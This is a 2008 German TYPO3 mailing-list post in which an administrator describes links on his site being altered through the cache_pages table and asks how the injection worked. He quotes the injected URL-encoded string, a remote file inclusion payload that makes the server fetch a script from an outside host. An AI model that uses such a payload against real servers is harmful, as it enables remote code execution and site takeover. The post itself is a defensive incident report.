[TYPO3-german] Injection in cache_pages?

Alexander Herrmann darignac at googlemail.com
Fri Apr 25 11:57:35 CEST 2008


Hallo zusammen,

wir haben in einem unserer Typo3-Installationen grad einen kleinen
Angriff gehabt. Und zwar hatte jeder Link der Seite noch einen kleinen
Anhang ala "&L=0%2F%2Fncaster%2Fadmi...m%2Fimag%2Fstringa.txt%3F%2Fncaster%2Fadmin%2Faddons%2Farchive%2Farchive.php%3Fadminfolder%3Dhttp%3A%2F%2Fxuxulio.iespana.es%2Fxuxuon.txt%3F%3F"

Die Frage, die sich mir stellt, ist nun, wie man das da einschleusen
kann. Die Werte standen nur in der cache_pages Tabelle bei dem Eintrag
zur entsprechenden Seite. Ich weiß dass es bei der Indexsuche mal
einen Injection-Bug gab, unsere Typo3-Version ist 4.0.4, d.h. es
könnte daran liegen. Aber da bei den Security Bulletins jetzt nicht
wirklich ausführliches steht, weiß ich nicht ob das zutrifft. Kann mir
das vielleicht jemand bestätigen bzw. weiß jemand, wie man da Werte
einschleusen könnte?

Ich danke,

ciao
Alex


More information about the TYPO3-german mailing list